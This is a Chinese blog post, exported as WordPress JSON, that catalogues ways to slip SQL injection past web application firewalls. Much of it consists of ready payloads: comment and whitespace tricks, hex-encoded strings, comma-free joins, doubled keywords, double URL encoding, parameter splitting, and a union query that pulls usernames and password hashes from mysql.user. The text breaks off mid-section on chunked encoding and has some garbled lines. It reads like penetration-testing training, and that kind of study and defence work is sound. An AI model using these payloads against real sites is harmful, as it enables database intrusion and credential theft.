{"id":770,"date":"2025-10-24T14:58:53","date_gmt":"2025-10-24T06:58:53","guid":{"rendered":"https:\/\/www.youvii.site\/?p=770"},"modified":"2025-10-24T15:01:14","modified_gmt":"2025-10-24T07:01:14","slug":"sqlzhururaoguo","status":"publish","type":"post","link":"https:\/\/www.youvii.site\/index.php\/archives\/sqlzhururaoguo","title":{"rendered":"SQL\u6ce8\u5165\u7ed5\u8fc7"},"content":{"rendered":"<h1>SQL\u6ce8\u5165\u7ed5\u8fc7<\/h1>\n<p>\u9632\u6ce8\u5165\u53ef\u4ee5\u4f7f\u7528\u67d0\u4e9b\u4e91 waf\u52a0\u901f\u4e50\u7b49\u5b89\u5168\u4ea7\u54c1\uff0c\u8fd9\u4e9b\u4ea7\u54c1\u4f1a\u81ea\u5e26 waf \u5c5e\u6027\u62e6\u622a\u548c\u62b5\u5fa1 SQL \u6ce8\u5165\uff0c\u4e5f\u6709\u4e00\u4e9b\u4ea7\u54c1\u4f1a\u5728\u670d\u52a1\u5668\u91cc\u5b89\u88c5\u8f6f\u4ef6\uff0c\u4f8b\u5982 iis \u5b89\u5168\u72d7\u3001d \u76fe\u3001\u8fd8\u6709\u5c31\u662f\u5728\u7a0b\u5e8f\u91cc\u5bf9\u8f93\u5165\u53c2\u6570\u8fdb\u884c\u8fc7\u6ee4\u548c\u62e6\u622a \u4f8b\u5982 360webscan \u811a\u672c\u7b49\u53ea\u8981\u53c2\u6570\u4f20\u5165\u7684\u65f6\u5019\u5c31\u4f1a\u8fdb\u884c\u68c0\u6d4b\uff0c\u68c0\u6d4b\u5230\u6709\u5371\u5bb3\u8bed\u53e5\u5c31\u4f1a\u62e6\u622a\u3002SQL \u6ce8\u5165\u7ed5\u8fc7\u7684\u6280\u672f\u4e5f\u6709\u8bb8\u591a\u3002\u4f46\u662f\u5728\u65e5\u6e10\u6210\u719f\u7684 waf \u4ea7\u54c1\u9762\u524d\uff0c\u56e0\u4e3a waf \u4ea7\u54c1\u7684\u89c4\u5219\u8d8a\u6765\u8d8a\u5b8c\u5584\uff0c\u6240\u4ee5\u9632\u5fa1\u5c31\u4f1a\u8d8a\u6765\u8d8a\u9ad8\uff0c\u5b89\u5168\u7cfb\u7edf\u4e5f\u8ddf\u7740\u63d0\u9ad8\uff0c\u5bf9\u6e17\u900f\u6d4b\u8bd5\u800c\u8a00\uff0c\u6d4b\u8bd5\u7684\u96be\u5ea6\u5c31\u8d8a\u6765\u8d8a\u9ad8\u4e86\u3002\u63a5\u4e0b\u6765\u5c06\u4f1a\u8be6\u7ec6\u4ecb\u7ecd\u9488\u5bf9 waf \u7684\u62e6\u622a\u6ce8\u5165\u7684\u7ed5\u8fc7\u65b9\u6cd5\u3002<\/p>\n<h2>\u7a7a\u683c\u5b57\u7b26\u7ed5\u8fc7<\/h2>\n<p>\u4e24\u4e2a\u7a7a\u683c\u4ee3\u66ff\u4e00\u4e2a\u7a7a\u683c\uff0c\u7528 Tab \u4ee3\u66ff\u7a7a\u683c\uff0c%a0=\u7a7a\u683c<\/p>\n<p>%20 %09 %0a %0b %0c %0d %a0 %00 \/*<em>\/ \/<\/em>!*\/<\/p>\n<p>select <em> from users where id=1 \/<\/em>!union<em>\/\/<\/em>!select*\/1,2,3,4;<\/p>\n<p>%09 TAB \u952e\uff08\u6c34\u5e73\uff09<\/p>\n<p>%0a \u65b0\u5efa\u4e00\u884c<\/p>\n<p>%0c \u65b0\u7684\u4e00\u9875<\/p>\n<p>%0d return \u529f\u80fd<\/p>\n<p>%0b TAB \u952e\uff08\u5782\u76f4\uff09<\/p>\n<p>%a0 \u7a7a\u683c<\/p>\n<p>\u53ef\u4ee5\u5c06\u7a7a\u683c\u5b57\u7b26\u66ff\u6362\u6210\u6ce8\u91ca \/*<em>\/ \u8fd8\u53ef\u4ee5\u4f7f\u7528 \/<\/em>!\u8fd9\u91cc\u7684\u6839\u636e mysql \u7248\u672c\u7684\u5185\u5bb9\u4e0d\u6ce8\u91ca*\/<\/p>\n<h2>\u5927\u5c0f\u5199\u7ed5\u8fc7<\/h2>\n<p>\u5c06\u5b57\u7b26\u4e32\u8bbe\u7f6e\u4e3a\u5927\u5c0f\u5199\uff0c\u4f8b\u5982 and 1=1 \u8f6c\u6210 AND 1=1 AnD 1=1<\/p>\n<p>select * from users where id=1 UNION SELECT 1,2,3,4;<\/p>\n<p>select * from users where id=1 UniON SelECT 1,2,3,4;<\/p>\n<p>\u8fc7\u6ee4\u7a7a\u683c\u53ef\u4ee5\u7528%0 \u4ee3\u66ff \u4e5f\u8fc7\u6ee4# &#8212; \u6ce8\u91ca \u7528\u5b57\u7b26\u4e32\u5339\u914d<\/p>\n<h2>\u6d6e\u70b9\u6570\u7ed5\u8fc7<\/h2>\n<p>select * from users where id=8E0union select 1,2,3,4;<\/p>\n<p>select * from users where id=8.0union select 1,2,3,4;<\/p>\n<h2>NULL\u503c\u7ed5\u8fc7<\/h2>\n<p>elect N; \u4ee3\u8868 null<\/p>\n<p>elect * from users where id=Nunion select 1,2,3,N;<\/p>\n<p>select * from users where id=Nunion select 1,2,3,Nfrom users;<\/p>\n<h2>\u5f15\u53f7\u7ed5\u8fc7<\/h2>\n<p>\u5982\u679c waf \u62e6\u622a\u8fc7\u6ee4\u5355\u5f15\u53f7\u7684\u65f6\u5019\uff0c\u53ef\u4ee5\u4f7f\u7528\u53cc\u5f15\u53f7 \u5728 mysql \u91cc\u4e5f\u53ef\u4ee5\u7528\u53cc\u5f15\u53f7\u4f5c\u4e3a\u5b57\u7b26\u4e32\u3002<\/p>\n<p>select * from users where id=&#8217;1&#8242;;<\/p>\n<p>select * from users where id=&quot;1&quot;;<\/p>\n<p>\u4e5f\u53ef\u4ee5\u5c06\u5b57\u7b26\u4e32\u8f6c\u6362\u6210 16 \u8fdb\u5236 \u518d\u8fdb\u884c\u67e5\u8be2\u3002<\/p>\n<p>select hex(&#8216;admin&#8217;);<\/p>\n<p>select * from users where username=&#8217;admin&#8217;;<\/p>\n<p>select * from users where username=0x61646D696E;<\/p>\n<p>\u5982\u679c gpc \u5f00\u542f\u4e86\uff0c\u4f46\u662f\u6ce8\u5165\u70b9\u662f\u6574\u5f62 \u4e5f\u53ef\u4ee5\u7528 hex \u5341\u516d\u8fdb\u5236\u8fdb\u884c\u7ed5\u8fc7<\/p>\n<p>select * from users where id=-1 union select 1,2,(select group_concat(column_name)<\/p>\n<p>from information_schema.columns where TABLE_NAME=&#8217;users&#8217; limit 1),4;<\/p>\n<p>select * from users where id=-1 union select 1,2,(select group_concat(column_name)<\/p>\n<p>from information_schema.columns where TABLE_NAME=0x7573657273 limit 1),4;<\/p>\n<p>\u53ef\u4ee5\u770b\u5230\u5b58\u5728\u6574\u578b\u6ce8\u5165\u7684\u65f6\u5019 \u6ca1\u6709\u7528\u5230\u5355\u5f15\u53f7 \u6240\u4ee5\u53ef\u4ee5\u6ce8\u5165\u3002<\/p>\n<h2>\u6dfb\u52a0\u5e93\u540d\u7ed5\u8fc7<\/h2>\n<p>\u4ee5\u4e0b\u4e24\u6761\u67e5\u8be2\u8bed\u53e5\uff0c\u6267\u884c\u7684\u7ed3\u679c\u662f\u4e00\u81f4\u7684\uff0c\u4f46\u662f\u6709\u4e9b waf \u7684\u62e6\u622a\u89c4\u5219 \u5e76\u4e0d\u4f1a\u62e6<\/p>\n<p>\u622a[\u5e93\u540d].[\u8868\u540d]\u8fd9\u79cd\u6a21\u5f0f\u3002<\/p>\n<p>select * from users where id=-1 union select 1,2,3,4 from users;<\/p>\n<p>select * from users where id=-1 union select 1,2,3,4 from moonsec.users;<\/p>\n<p>mysql \u4e2d\u4e5f\u53ef\u4ee5\u6dfb\u52a0\u5e93\u540d\u67e5\u8be2\u8868\u3002\u4f8b\u5982\u8de8\u5e93\u67e5\u8be2 mysql \u5e93\u91cc\u7684 usrs \u8868\u7684\u5185\u5bb9\u3002<\/p>\n<p>select * from users where id=-1 union select 1,2,3,concat(user,authentication_string)<\/p>\n<p>from mysql.user;<\/p>\n<h2>\u53bb\u91cd\u590d\u7ed5\u8fc7<\/h2>\n<p>\u5728 mysql \u67e5\u8be2\u53ef\u4ee5\u4f7f\u7528 distinct \u53bb\u9664\u67e5\u8be2\u7684\u91cd\u590d\u503c\u3002\u53ef\u4ee5\u5229\u7528\u8fd9\u70b9\u7a81\u7834 waf \u62e6\u622a<\/p>\n<p>select * from users where id=-1 union distinct select 1,2,3,4 from users;<\/p>\n<p>select * from users where id=-1 union distinct select 1,2,3,version() from users;<\/p>\n<h2>\u53cd\u5f15\u53f7\u7ed5\u8fc7<\/h2>\n<p>\u5728 mysql \u53ef\u4ee5\u4f7f\u7528 <code>\u8fd9\u91cc\u662f\u53cd\u5f15\u53f7<\/code> \u7ed5\u8fc7\u4e00\u4e9b waf \u62e6\u622a\u3002\u5b57\u6bb5\u53ef\u4ee5\u52a0\u53cd\u5f15\u53f7\u6216\u8005\u4e0d\u52a0\uff0c\u610f\u4e49\u76f8\u540c\u3002<\/p>\n<p>insert into users(username,password,email)values(&#8216;moonsec&#8217;,&#8217;123456&#8242;,&#8217;admin@moonsec.com&#8217;);<\/p>\n<p>insert into users(<code>username<\/code>,<code>password<\/code>,<code>email<\/code>)values(&#8216;moonsec&#8217;,&#8217;123456&#8242;,&#8217;admin@moonsec.com&#8217;);<\/p>\n<h2>\u811a\u672c\u8bed\u8a00\u7279\u6027\u7ed5\u8fc7<\/h2>\n<p>\u5728 php \u8bed\u8a00\u4e2d id=1&amp;id=2 \u540e\u9762\u7684\u503c\u4f1a\u81ea\u52a8\u8986\u76d6\u524d\u9762\u7684\u503c\uff0c\u4e0d\u540c\u7684\u8bed\u8a00\u6709\u4e0d\u540c\u7684\u7279\u6027\u3002\u53ef\u4ee5\u5229\u7528\u8fd9\u70b9\u7ed5\u8fc7\u4e00\u4e9b waf \u7684\u62e6\u622a\u3002id=1%00&amp;id=2 union select 1,2,3<\/p>\n<p>\u6709\u4e9b waf \u56de\u53bb\u5339\u914d\u7b2c\u4e00\u4e2a id \u53c2\u6570 1%00 %00 \u662f\u622a\u65ad\u5b57\u7b26\uff0cwaf \u4f1a\u81ea\u52a8\u622a\u65ad \u4ece\u800c\u4e0d\u4f1a\u68c0\u6d4b\u540e\u9762\u7684\u5185\u5bb9\u3002\u5230\u4e86\u7a0b\u5e8f\u4e2d id \u5c31\u662f\u7b49\u4e8e id=2 union select 1,2,3 \u4ece\u7ed5\u8fc7\u6ce8\u5165\u62e6\u622a\u3002<\/p>\n<p>\u5176\u4ed6\u8bed\u8a00\u7279\u6027<\/p>\n<p><img loading="lazy" decoding="async" decoding=\"async\"  src=\"https:\/\/www.youvii.site\/wp-content\/themes\/lolimeow-lolimeowV13.13\/assets\/images\/loading.gif\" data-src=\"https:\/\/cdn.picui.cn\/vip\/2025\/10\/24\/68fae6619d0c2.png\" class=\"lazy\" loading=\"lazy\" alt=\"1745992208993-b6b65592-61fd-4c72-a3a3-7a2b46f4789f.png\" \/><\/p>\n<h2>\u9017\u53f7\u7ed5\u8fc7<\/h2>\n<p>\u76ee\u524d\u6709\u4e9b\u9632\u6ce8\u5165\u811a\u672c\u90fd\u4f1a\u9017\u53f7\u8fdb\u884c\u62e6\u622a\uff0c\u4f8b\u5982\u5e38\u89c4\u6ce8\u5165\u4e2d\u5fc5\u987b\u5305\u542b\u9017\u53f7<\/p>\n<p>select * from users where id=1 union select 1,2,3,4;<\/p>\n<p>\u4e00\u822c\u4f1a\u5bf9\u9017\u53f7\u8fc7\u6ee4\u6210\u7a7a select * from users where id=1 union select 1 2 3 4;\u8fd9\u6837<\/p>\n<p>SQL \u8bed\u53e5\u5c31\u4f1a\u51fa\u9519\u3002\u6240\u4ee5 \u53ef\u4ee5\u4e0d\u4f7f\u7528\u9017\u53f7\u8fdb\u884c SQL \u6ce8\u5165\u3002<\/p>\n<h2>substr\u622a\u53d6\u5b57\u7b26\u4e32<\/h2>\n<p>select(substr(database() from 1 for 1)); \u67e5\u8be2\u5f53\u524d\u5e93\u7b2c\u4e00\u4e2a\u5b57\u7b26<\/p>\n<p>\u67e5\u8be2 m \u7b49\u4e8e select(substr(database() from 1 for 1))\u9875\u9762\u8fd4\u56de\u6b63\u5e38<\/p>\n<p>select * from users where id=1 and &#8216;m&#8217;=(select(substr(database() from 1 for 1)));<\/p>\n<p>\u53ef\u4ee5\u8fdb\u4e00\u6b65\u4f18\u5316 m \u6362\u6210 hex 0x6D \u8fd9\u6837\u5c31\u907f\u514d\u4e86\u5355\u5f15\u53f7<\/p>\n<p>select * from users where id=1 and 0x6D=(select(substr(database() from 1 for 1)));<\/p>\n<h2>min\u622a\u53d6\u5b57\u7b26\u4e32<\/h2>\n<p>\u8fd9\u4e2a min \u51fd\u6570\u8ddf substr \u51fd\u6570\u529f\u80fd\u76f8\u540c \u5982\u679c substr \u51fd\u6570\u88ab\u62e6\u622a\u6216\u8005\u8fc7\u6ee4\u53ef\u4ee5\u4f7f\u7528\u8fd9\u4e2a\u51fd\u6570\u4ee3\u66ff\u3002<\/p>\n<p>select mid(database() from 1 for 1); \u8fd9\u4e2a\u65b9\u6cd5\u5982\u4e0a\u3002<\/p>\n<p>select * from users where id=1 and &#8216;m&#8217;=(select(mid(database() from 1 for 1)));<\/p>\n<p>select * from users where id=1 and 0x6D=(select(mid(database() from 1 for 1)));<\/p>\n<h2>join\u7ed5\u8fc7<\/h2>\n<p>\u4f7f\u7528 join \u81ea\u8fde\u63a5\u4e24\u4e2a\u8868<\/p>\n<p>union select 1,2 #\u7b49\u4ef7\u4e8e union select * from (select 1)a join (select 2)b<\/p>\n<p>a \u548c b \u5206\u522b\u662f\u8868\u7684\u522b\u540d<\/p>\n<p>select * from users where id=-1 union select 1,2,3,4;<\/p>\n<p>select <em> from users where id=-1 union select <\/em> from (select 1)a join (select 2)b<\/p>\n<p>join(select 3)c join(select 4)d;<\/p>\n<p>select <em> from users where id=-1 union select <\/em> from (select 1)a join (select 2)b<\/p>\n<p>join(select user())c join(select 4)d;<\/p>\n<p>\u53ef\u4ee5\u770b\u5230\u8fd9\u91cc\u4e5f\u6ca1\u6709\u4f7f\u7528\u9017\u53f7\uff0c\u4ece\u800c\u7ed5\u8fc7 waf \u5bf9\u9017\u53f7\u7684\u62e6\u622a\u3002<\/p>\n<h2>like\u7ed5\u8fc7<\/h2>\n<p>\u4f7f\u7528 like \u6a21\u7cca\u67e5\u8be2 select user() like &#8216;%r%&#8217;; \u6a21\u7cca\u67e5\u8be2\u6210\u529f\u8fd4\u56de 1 \u5426\u5219\u8fd4\u56de 0<\/p>\n<p>\u627e\u5230\u7b2c\u4e00\u4e2a\u5b57\u7b26\u540e\u7ee7\u7eed\u8fdb\u884c\u4e0b\u4e00\u4e2a\u5b57\u7b26\u5339\u914d\u3002\u4ece\u800c\u627e\u5230\u6240\u6709\u7684\u5b57\u7b26\u4e32 \u6700\u540e\u5c31\u662f\u8981\u67e5\u8be2\u7684\u5185\u5bb9\uff0c\u8fd9\u79cd SQL \u6ce8\u5165\u8bed\u53e5\u4e5f\u4e0d\u4f1a\u5b58\u5728\u9017\u53f7\u3002\u4ece\u800c\u7ed5\u8fc7 waf \u62e6\u622a\u3002<\/p>\n<h2>limit offset\u7ed5\u8fc7<\/h2>\n<p>SQL \u6ce8\u5165\u65f6\uff0c\u5982\u679c\u9700\u8981\u9650\u5b9a\u6761\u76ee\u53ef\u4ee5\u4f7f\u7528 limit 0,1 \u9650\u5b9a\u8fd4\u56de\u6761\u76ee\u7684\u6570\u76ee limit 0,1\u8fd4\u56de\u6761\u4e00\u6761\u8bb0\u5f55 \u5982\u679c\u5bf9\u9017\u53f7\u8fdb\u884c\u62e6\u622a\u65f6\uff0c\u53ef\u4ee5\u4f7f\u7528 limit 1 \u9ed8\u8ba4\u8fd4\u56de\u7b2c\u4e00\u6761\u6570\u636e\u3002\u4e5f\u53ef\u4ee5\u4f7f\u7528 limit 1 offset 0 \u4ece\u96f6\u5f00\u59cb\u8fd4\u56de\u7b2c\u4e00\u6761\u8bb0\u5f55\uff0c\u8fd9\u6837\u5c31\u7ed5\u8fc7 waf \u62e6\u622a\u4e86\u3002<\/p>\n<h2>or and xor not\u7ed5\u8fc7<\/h2>\n<p>\u76ee\u524d\u4e3b\u6d41\u7684 waf \u90fd\u4f1a\u5bf9 id=1 and 1=2\u3001id=1 or 1=2\u3001id=0 or 1=2<\/p>\n<p>id=0 xor 1=1 limit 1 \u3001id=1 xor 1=2<\/p>\n<p>\u5bf9\u8fd9\u4e9b\u5e38\u89c1\u7684 SQL \u6ce8\u5165\u68c0\u6d4b\u8bed\u53e5\u8fdb\u884c\u62e6\u622a\u3002\u50cf and \u8fd9\u4e9b\u8fd8\u6709\u5b57\u7b26\u4ee3\u66ff<\/p>\n<p>\u5b57\u7b26\u5982\u4e0b<\/p>\n<p>and \u7b49\u4e8e&amp;&amp;<\/p>\n<p>or \u7b49\u4e8e ||<\/p>\n<p>not \u7b49\u4e8e !<\/p>\n<p>xor \u7b49\u4e8e|<\/p>\n<p>\u6240\u4ee5\u53ef\u4ee5\u8f6c\u6362\u6210\u8fd9\u6837<\/p>\n<p>id=1 and 1=1 \u7b49\u4e8e id=1 &amp;&amp; 1=1<\/p>\n<p>id=1 and 1=2 \u7b49\u4e8e id=1 &amp;&amp; 1=2<\/p>\n<p>id=1 or 1=1 \u7b49\u4e8e id=1 || 1=1<\/p>\n<p>id=0 or 1=0 \u7b49\u4e8e id=0 || 1=0<\/p>\n<p>\u53ef\u4ee5\u7ed5\u8fc7\u4e00\u4e9b waf \u62e6\u622a\u7ee7\u7eed\u5bf9\u6ce8\u5165\u70b9\u8fdb\u884c\u5b89\u5168\u68c0\u6d4b<\/p>\n<p>\u4e5f\u53ef\u4ee5\u4f7f\u7528\u8fd0\u7b97\u7b26\u53f7<\/p>\n<p>id=1 &amp;&amp; 2=1+1<\/p>\n<p>id=1 &amp;&amp; 2=1-1<\/p>\n<h2>ascii\u5b57\u7b26\u5bf9\u6bd4\u7ed5\u8fc7<\/h2>\n<p>\u8bb8\u591a waf \u4f1a\u5bf9 union select \u8fdb\u884c\u62e6\u622a \u800c\u4e14\u901a\u5e38\u6bd4\u8f83\u53d8\u6001\uff0c\u90a3\u4e48\u53ef\u4ee5\u4e0d\u4f7f\u7528\u8054\u5408\u67e5<\/p>\n<p>\u8be2\u6ce8\u5165\uff0c\u53ef\u4ee5\u4f7f\u7528\u5b57\u7b26\u622a\u53d6\u5bf9\u6bd4\u6cd5\uff0c\u8fdb\u884c\u7a81\u7834\u3002<\/p>\n<p>select substring(user(),1,1);<\/p>\n<p>select * from users where id=1 and substring(user(),1,1)=&#8217;r&#8217;;<\/p>\n<p>select * from users where id=1 and ascii(substring(user(),1,1))=114;<\/p>\n<p>\u6700\u597d\u628a&#8217;r&#8217;\u6362\u6210\u6210 ascii \u7801 \u5982\u679c\u5f00\u542f gpc int \u6ce8\u5165\u5c31\u4e0d\u80fd\u7528\u4e86\u3002<\/p>\n<p>\u53ef\u4ee5\u770b\u5230\u6784\u9020\u5f97 SQL \u653b\u51fb\u8bed\u53e5\u6ca1\u6709\u4f7f\u7528\u8054\u5408\u67e5\u8be2(union select)\u4e5f\u53ef\u4ee5\u628a\u6570\u636e\u67e5\u8be2\u51fa\u6765\u3002<\/p>\n<h2>\u7b49\u53f7\u7ed5\u8fc7<\/h2>\n<p>\u5982\u679c\u7a0b\u5e8f\u4f1a\u5bf9=\u8fdb\u884c\u62e6\u622a \u53ef\u4ee5\u4f7f\u7528 like rlike regexp \u6216\u8005\u4f7f\u7528&lt;\u6216\u8005&gt;<\/p>\n<p>select * from users where id=1 and ascii(substring(user(),1,1))&lt;115;<\/p>\n<p>select * from users where id=1 and ascii(substring(user(),1,1))&gt;115;<\/p>\n<p>select * from users where id=1 and (select substring(user(),1,1)like &#8216;r%&#8217;);<\/p>\n<p>select * from users where id=1 and (select substring(user(),1,1)rlike &#8216;r&#8217;);<\/p>\n<p>select * from users where id=1 and 1=(select user() regexp &#8216;^r&#8217;);<\/p>\n<p>select * from users where id=1 and 1=(select user() regexp &#8216;^a&#8217;);<\/p>\n<p>regexp \u540e\u9762\u662f\u6b63\u5219<\/p>\n<h2>\u53cc\u5173\u952e\u8bcd\u7ed5\u8fc7<\/h2>\n<p>\u6709\u4e9b\u7a0b\u5e8f\u4f1a\u5bf9\u5355\u8bcd union\u3001 select \u8fdb\u884c\u8f6c\u7a7a \u4f46\u662f\u53ea\u4f1a\u8f6c\u4e00\u6b21\u8fd9\u6837\u4f1a\u7559\u4e0b\u5b89\u5168\u9690\u60a3\u3002<\/p>\n<p>\u53cc\u5173\u952e\u5b57\u7ed5\u8fc7\uff08\u82e5\u5220\u9664\u6389\u7b2c\u4e00\u4e2a\u5339\u914d\u7684 union \u5c31\u80fd\u7ed5\u8fc7\uff09<\/p>\n<p>id=-1&#8217;UNIunionONSeLselectECT1,2,3&#8211;+<\/p>\n<p>\u5230\u6570\u636e\u5e93\u91cc\u6267\u884c\u4f1a\u53d8\u6210 id=-1&#8217;UNION SeLECT1,2,3&#8211;+ \u4ece\u800c\u7ed5\u8fc7\u6ce8\u5165\u62e6\u622a\u3002<\/p>\n<h2>\u4e8c\u6b21\u7f16\u7801\u7ed5\u8fc7<\/h2>\n<p>\u6709\u4e9b\u7a0b\u5e8f\u4f1a\u89e3\u6790\u4e8c\u6b21\u7f16\u7801\uff0c\u9020\u6210 SQL \u6ce8\u5165\uff0c\u56e0\u4e3a url \u4e24\u6b21\u7f16\u7801\u8fc7\u540e\uff0cwaf \u662f\u4e0d\u4f1a\u62e6\u622a\u7684\u3002<\/p>\n<p>-1 union select 1,2,3,4#<\/p>\n<p>\u7b2c\u4e00\u6b21\u8f6c\u7801<\/p>\n<p>%2d%31%20%75%6e%69%6f%6e%20%73%65%6c%65%63%74%20%31%2c%32%2c%33%2c%34%23<\/p>\n<p>\u7b2c\u4e8c\u6b21\u8f6c\u7801<\/p>\n<p>%25%32%64%25%33%31%25%32%30%25%37%35%25%36%65%25%36%39%25%36%66%25%36%65%25%32%30%25%37%33%25%36%35%25%36%63%25%36%35%25%36%33%25%37%34%25%32%30%25%33%31%25%32%63%25%33%32%25%32%63%25%33%33%25%32%63%25%33%34%25%32%33<\/p>\n<p>\u4e8c\u6b21\u7f16\u7801\u6ce8\u5165\u6f0f\u6d1e\u5206\u6790 \u5728\u6e90\u4ee3\u7801\u4e2d\u5df2\u7ecf\u5f00\u542f\u4e86 gpc \u5bf9\u7279\u6b8a\u5b57\u7b26\u8fdb\u884c\u8f6c\u4e49\u4ee3\u7801\u91cc\u6709 urldecode \u8fd9\u4e2a\u51fd\u6570\u662f\u5bf9\u5b57\u7b26 url \u89e3\u7801\uff0c\u56e0\u4e3a\u4e24\u6b21\u7f16\u7801 GPC \u662f\u4e0d\u4f1a\u8fc7\u6ee4\u7684\uff0c\u6240\u4ee5\u53ef\u4ee5\u7ed5\u8fc7 gpc \u5b57\u7b26\u8f6c\u4e49\uff0c\u8fd9\u6837\u4e5f\u5c31\u7ed5\u8fc7\u4e86 waf \u7684\u62e6\u622a\u3002<\/p>\n<h2>\u591a\u53c2\u6570\u62c6\u5206\u7ed5\u8fc7<\/h2>\n<p>\u591a\u4f59\u591a\u4e2a\u53c2\u6570\u62fc\u63a5\u5230\u540c\u4e00\u6761 SQL \u8bed\u53e5\u4e2d\uff0c\u53ef\u4ee5\u5c06\u6ce8\u5165\u8bed\u53e5\u5206\u5272\u63d2\u5165\u3002<\/p>\n<p>\u4f8b\u5982\u8bf7\u6c42 get \u53c2\u6570<\/p>\n<p>a=[input1]&amp;b=[input2] \u53ef\u4ee5\u5c06\u53c2\u6570 a \u548c b \u62fc\u63a5\u5728 SQL \u8bed\u53e5\u4e2d\u3002<\/p>\n<p>\u5728\u7a0b\u5e8f\u4ee3\u7801\u4e2d\u770b\u5230\u4e24\u4e2a\u53ef\u63a7\u7684\u53c2\u6570\uff0c\u4f46\u662f\u4f7f\u7528 union select \u4f1a\u88ab waf \u62e6\u622a<\/p>\n<p>\u90a3\u4e48\u53ef\u4ee5\u4f7f\u7528\u53c2\u6570\u62c6\u4efd\u8bf7\u6c42\u7ed5\u8fc7 waf \u62e6\u622a<\/p>\n<p>-1&#8217;union\/<em>&amp;username=<\/em>\/select 1,user(),3,4&#8211;+<\/p>\n<p>\u4e24\u4e2a\u53c2\u6570\u7684\u503c\u53ef\u4ee5\u63a7\uff0c\u5206\u89e3 SQL \u6ce8\u5165\u5173\u952e\u5b57 \u53ef\u4ee5\u7ec4\u5408\u4e00\u4e9b SQL \u6ce8\u5165\u8bed\u53e5\u7a81\u7834<\/p>\n<p>waf \u62e6\u622a\u3002<\/p>\n<h2>\u751f\u50fb\u51fd\u6570\u7ed5\u8fc7<\/h2>\n<p>\u4f7f\u7528\u751f\u50fb\u51fd\u6570\u66ff\u4ee3\u5e38\u89c1\u7684\u51fd\u6570\uff0c\u4f8b\u5982\u5728\u62a5\u9519\u6ce8\u5165\u4e2d\u4f7f\u7528 polygon()\u51fd\u6570\u66ff\u6362\u5e38\u7528<\/p>\n<p>\u7684 updatexml()\u51fd\u6570<\/p>\n<p>select polygon((select <em> from (select <\/em> from (select @@version) f) x));<\/p>\n<h2>\u5206\u5757\u4f20\u8f93\u7ed5\u8fc7<\/h2>\n<p>\u4e00\u3001\u4ec0\u4e48\u662f chunked \u7f16\u7801\uff1f<\/p>\n<p>\u5206\u5757\u4f20\u8f93\u7f16\u7801\uff08Chunked transfer encoding\uff09\u662f\u53ea\u5728 HTTP \u534f\u8bae 1.1 \u7248\u672c\uff08HTTP\/1.1\uff09\u4e2d\u63d0\u4f9b\u7684\u4e00\u79cd\u6570\u636e\u4f20\u9001\u673a\u5236\u3002\u4ee5\u5f80 HTTP \u7684\u5e94\u7b54\u4e2d\u6570\u636e\u662f\u6574\u4e2a\u4e00\u8d77\u53d1\u9001\u7684\uff0c\u5e76\u5728\u5e94\u7b54\u5934\u91cc Content-Length \u5b57\u6bb5\u6807\u8bc6\u4e86\u6570\u636e\u7684\u957f\u5ea6\uff0c\u4ee5\u4fbf\u5ba2\u6237\u7aef\u77e5\u9053\u5e94\u7b54\u6d88\u606f\u7684\u7ed3\u675f\u3002<\/p>\n<p>\u4f20\u7edf\u7684 Content-length \u89e3\u51b3\u65b9\u6848\uff1a\u8ba1\u7b97\u5b9e\u4f53\u957f\u5ea6\uff0c\u5e76\u901a\u8fc7\u5934\u90e8\u544a\u8bc9\u5bf9\u65b9\u3002\u6d4f\u89c8\u5668\u53ef\u4ee5\u901a\u8fc7 Content-Length \u7684\u957f\u5ea6\u4fe1\u606f\uff0c\u5224\u65ad\u51fa\u54cd\u5e94\u5b9e\u4f53\u5df2\u7ed3\u675fContent-length \u9762\u4e34\u7684\u95ee\u9898\uff1a\u7531\u4e8e Content-Length \u5b57\u6bb5\u5fc5\u987b\u771f\u5b9e\u53cd\u6620\u5b9e\u4f53\u957f\u5ea6\uff0c\u4f46\u662f\u5bf9\u4e8e\u52a8\u6001\u751f\u6210\u7684\u5185\u5bb9\u6765\u8bf4\uff0c\u5728\u5185\u5bb9\u521b\u5efa\u5b8c\u4e4b\u524d\uff0c\u957f\u5ea6\u662f\u4e0d\u53ef\u77e5\u7684\u3002<\/p>\n<p>\u8fd9\u65f6\u5019\u8981\u60f3\u51c6\u786e\u83b7\u53d6\u957f\u5ea6\uff0c\u53ea\u80fd\u5f00\u4e00\u4e2a\u8db3\u591f\u5927\u7684 buffer\uff0c\u7b49\u5185\u5bb9\u5168\u90e8\u751f\u6210\u597d\u518d\u8ba1\u7b97\u3002\u8fd9\u6837\u505a\u4e00\u65b9\u9762\u9700\u8981\u66f4\u5927\u7684\u5185\u5b58\u5f00\u9500\uff0c\u53e6\u4e00\u65b9\u9762\u4e5f\u4f1a\u8ba9\u5ba2\u6237\u7aef\u7b49\u66f4\u4e45\u3002\u6211\u4eec\u9700\u8981\u4e00\u4e2a\u65b0\u7684\u673a\u5236\uff1a\u4e0d\u4f9d\u8d56\u5934\u90e8\u7684\u957f\u5ea6\u4fe1\u606f\uff0c\u4e5f\u80fd\u77e5\u9053\u5b9e\u4f53\u7684\u8fb9\u754c\u2014\u2014\u5206\u5757\u7f16\u7801\uff08Transfer-Encoding: chunked\uff09\u3002<\/p>\n<p>\u5bf9\u4e8e\u52a8\u6001\u751f\u6210\u7684\u5e94\u7b54\u5185\u5bb9\u6765\u8bf4\uff0c\u5185\u5bb9\u5728\u672a\u751f\u6210\u5b8c\u6210\u524d\u603b\u957f\u5ea6\u662f\u4e0d\u53ef\u77e5\u7684\u3002\u56e0\u6b64\u9700\u8981\u5148\u7f13\u5b58\u751f\u6210\u7684\u5185\u5bb9\uff0c\u518d\u8ba1\u7b97\u603b\u957f\u5ea6\u586b\u5145\u5230 